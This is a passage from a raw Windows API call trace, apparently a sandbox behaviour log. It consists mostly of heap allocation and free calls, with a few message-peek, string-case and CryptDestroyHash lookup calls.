hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.866] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.867] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.867] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.867] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.868] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.868] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.869] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.869] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.869] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.870] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.870] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.871] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0188.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0188.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0188.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.871] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0188.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.872] CryptDestroyHash (hHash=0xaa58e0) returned 1 [0188.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0188.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.875] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 